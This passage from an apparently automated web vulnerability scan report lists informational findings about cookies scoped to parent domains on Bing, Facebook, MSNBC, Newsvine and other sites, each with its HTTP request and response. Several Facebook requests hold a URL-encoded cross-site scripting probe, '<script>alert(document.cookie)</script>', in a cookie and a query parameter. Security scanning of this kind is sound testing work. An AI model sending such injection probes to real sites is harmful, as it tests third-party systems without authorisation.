...[SNIP]...

16.266. http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 74503
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:28 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.031 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:28 GMT
Connection: close
Set-Cookie: _SS=SID=1C20FB52E6FA4423ADB90121688D5B2C; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c5ccc44826f8244ed9ff22ec7485c1ee5; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

16.267. http://www.facebook.com/2008/fbml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=GX4VM; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:52:38 GMT
Content-Length: 11463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

16.268. http://www.facebook.com/HelenASPopkin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /HelenASPopkin

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HelenASPopkin HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=rt6y1; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FHelenASPopkin; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHelenASPopkin; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 03:05:48 GMT
Content-Length: 14974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

16.269. http://www.facebook.com/campaign/impression.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/impression.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/impression.php?campaign_id=137675572948107&partner_id=thelastword.msnbc.msn.com&placement=like_button&extra_1=http%3A%2F%2Fthelastword.msnbc.redacted%2F%3F1406b%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E2b8d8f3d529%3D1&extra_2=US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=600&action=recommend&colorscheme=light&href=http://thelastword.msnbc.msn.com/_news/2011/01/27/5937356-kind-desk-delivery-update
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS; wd=90x20

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 43
Content-Type: image/gif
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dthelastword.msnbc.redacted%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fthelastword.msnbc.redacted%252F%253F1406b%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E2b8d8f3d529%253D1%26extra_2%3DUS; expires=Tue, 01-Mar-2011 12:48:02 GMT; path=/; domain=.facebook.com; httponly
X-Cnection: close
Date: Sun, 30 Jan 2011 12:48:02 GMT

GIF89a.............!.......,...........D..;

16.270. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=DtsRk; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:52:50 GMT
Content-Length: 10625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

16.271. http://www.facebook.com/todd.kenreck

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /todd.kenreck

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /todd.kenreck HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=VUacU; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Ftodd.kenreck; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftodd.kenreck; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 03:05:49 GMT
Content-Length: 14802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

16.272. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoovers.com
Path:   /business-information/--pageid__13823--/global-mktg-index.xhtml

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /business-information/--pageid__13823--/global-mktg-index.xhtml HTTP/1.1
Host: www.hoovers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:36 GMT
Server: Apache
Cache-Control: max-age=3600
Expires: Sun, 30 Jan 2011 02:53:36 GMT
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Set-Cookie: HID=173.193.214.243.1296352416131983; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com
Set-Cookie: HID=10.1.1.227.283831296352416137; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com
Set-Cookie: BIGipServerholpriv-colo1=1140916490.20480.0000; path=/
P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE"
Connection: close
Set-Cookie: BIGipServerwww-1=1341968906.20480.0000; path=/
Content-Length: 18009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Take Th
...[SNIP]...

16.273. http://www.iis.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iis.net
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.iis.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 34019
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: CSAnonymous=m0d2Yg7AywEkAAAAYzgxZWJhOTEtZjliYS00OWY2LWI5MmMtZGY2NmY1Y2VkOWJl0; domain=iis.net; expires=Sat, 29-Jan-2011 23:43:52 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   The Official M
...[SNIP]...

16.274. http://www.live.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.live.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.live.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; wlidperf=throughput=15&latency=192; LD=3871a7c5-0acf-46b1-b76d-faebaecf0536_00d7c3a81b1_15501_1294800676304=L5708&3871a7c5-0acf-46b1-b76d-faebaecf0536_00e1e3469a5_15501_1294800680668=L3088|U46904782&3871a7c5-0acf-46b1-b76d-faebaecf0536_00ea893c9b1_15501_1294800680555=L3271~sw:1920~sh:1200~c:16~bw:1142~bh:750&3871a7c5-0acf-46b1-b76d-faebaecf0536_00a12627c20_15501_1294800670164=U46914446&3871a7c5-0acf-46b1-b76d-faebaecf0536_004401fc3dc_15501_1294800633344=U46951808&3871a7c5-0acf-46b1-b76d-faebaecf0536_00b4d7765d1_15501_1294800671751=U46913589

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en-us; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.www.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:28:44 GMT; path=/
Set-Cookie: E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; domain=.live.com; path=/
Set-Cookie: wla42=; domain=live.com; expires=Sat, 05-Feb-2011 23:08:44 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:08:44 GMT
Content-Length: 345

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296342524&amp;rver=6.1.6206.0&amp;wp=MBI&amp;wrep
...[SNIP]...

16.275. http://www.morningstar.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.morningstar.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.morningstar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: private
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /IntroPage.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 134
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 01:54:03 GMT
Connection: close
Set-Cookie: fp=015129635244395354; expires=Sun May 21 02:00:00 2025; domain=.morningstar.com; path=/
Set-Cookie: IntroAd=true; domain=morningstar.com; expires=Sun, 30-Jan-2011 19:54:03 GMT; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fIntroPage.aspx">here</a>.</h2>
</body></html>

16.276. http://www.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redacted
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; stvx=gendermodule:forher
Host: www.redacted

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:26:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA39
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; domain=www.redacted; expires=Tue, 01-Feb-2011 23:26:28 GMT; path=/
Set-Cookie: expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; domain=redacted; expires=Sat, 12-Feb-2011 23:26:28 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
ntCoent-Length: 86107
Content-Length: 86107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...

16.277. http://www.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
RTSS: 1
Expires: Sat, 29 Jan 2011 23:53:39 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 23:53:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.redacted
Set-Cookie: SSID=AwDszSkAAAAAg6hETc0GBAmDqERNAQAAAAAAAAAAAAAAAACDqERNAAAAAAAAAAAAAAA; path=/; domain=.redacted; expires=Sun, 29-Jan-2012 23:53:39 GMT
Set-Cookie: SSSC=108.G5567760320082216653.1.0.0; path=/; domain=.redacted
Set-Cookie: SSRT=g6hETQE; path=/; domain=.redacted; expires=Sun, 29-Jan-2012 23:53:39 GMT
Set-Cookie: MC1=GUID=a90948ea4b8d4829b2d58fc150cbb23e; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Content-Length: 208222

<html><head>
<!-- // --><script language='javascript' type='text/javascript'>
<!--
   req_108_1296345219=new Image();
req_108_1296345219.src='/__ssobj/ard.png?5567760320082216653_1_0-108-'+(11527*112461
...[SNIP]...

16.278. http://www.msnbc.redacted/id/8004316/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/8004316/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /id/8004316/?from=en-us_msnhp HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
RTSS: 1
Expires: Sun, 30 Jan 2011 01:57:56 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:57:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.redacted
Set-Cookie: SSID=AwBTfCkAAAAApMVETRqCDgWkxURNAQAAAAAAAAAAAAAAAACkxURNAAAAAAAAAAAAAAA; path=/; domain=.redacted; expires=Mon, 30-Jan-2012 01:57:56 GMT
Set-Cookie: SSSC=108.G5567792347586920986.1.0.0; path=/; domain=.redacted
Set-Cookie: SSRT=pMVETQE; path=/; domain=.redacted; expires=Mon, 30-Jan-2012 01:57:56 GMT
Set-Cookie: MC1=GUID=6db8003adf854298adce0bc40466cda9; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Content-Length: 165444

<html><head>
<!-- // --><script language='javascript' type='text/javascript'>
<!--
   req_108_1296352676=new Image();
req_108_1296352676.src='/__ssobj/ard.png?5567792347586920986_1_0-108-'+(26891*48207+
...[SNIP]...

16.279. http://www.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:13:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=20d3e915c99117443eb51b0c141f325f; expires=Sat, 25-Jan-2031 03:13:58 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: sprout=2_cd9e4WPi9S8TA65nc4FRmISDbfld%2Bz1WpHy7rW3XmiijWVlFj9YKULk5rqZPYHTNzk9GF6CO7%2BXYkzPwgSOo13YhzbUSSyLOwO%2B6vGq3ySXmjD3Eg7P%2BQKpYWNqjYOuPuseiwN7bnR0vLsw97nbakOqq0wOdY0LAfFr8pXvFQl%2FEpbRgscYoYMKCLzqOimQzpLcu%2BPb3ZHvuf5qssV1%2Fch3eCPGUjyRGW%2BsBRftbD%2B1ztBgY4jcQ9ZW4CmzltUsM; expires=Sat, 25-Jan-2031 03:14:08 GMT; path=/; domain=.newsvine.com
Set-Cookie: vid=20d3e915c99117443eb51b0c141f325f; expires=Sat, 25-Jan-2031 03:14:08 GMT; path=/; domain=.newsvine.com
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 55258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...

16.280. http://www.newsvine.com/_action/article/emailThis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_action/article/emailThis

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_action/article/emailThis HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:40 GMT
Server: Apache/2.2.9 (Debian)
